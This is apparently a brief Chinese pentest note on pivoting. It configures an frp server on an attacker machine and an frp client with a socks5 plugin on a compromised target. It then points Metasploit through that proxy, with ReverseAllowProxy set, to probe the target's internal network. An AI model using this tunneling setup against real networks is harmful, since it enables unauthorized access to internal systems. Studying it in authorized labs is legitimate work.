攻击机配置 frps.ini
# frps.ini
[common]
bind_addr = 0.0.0.0
开启frp
./frps -c frps.ini
目标机配置 frpc.ini
# frpc.ini
[common]
server_addr = 攻击机IP
server_port = 7000
[http_proxy]
type = tcp
remote_port = 6000
plugin = socks5
开启frp
./frpc -c frpc.ini
MSF配置代理
setg Proxies socks5:172.16.12.128:6000
setg ReverseAllowProxy true
对目标靶机中的内网机器进行探测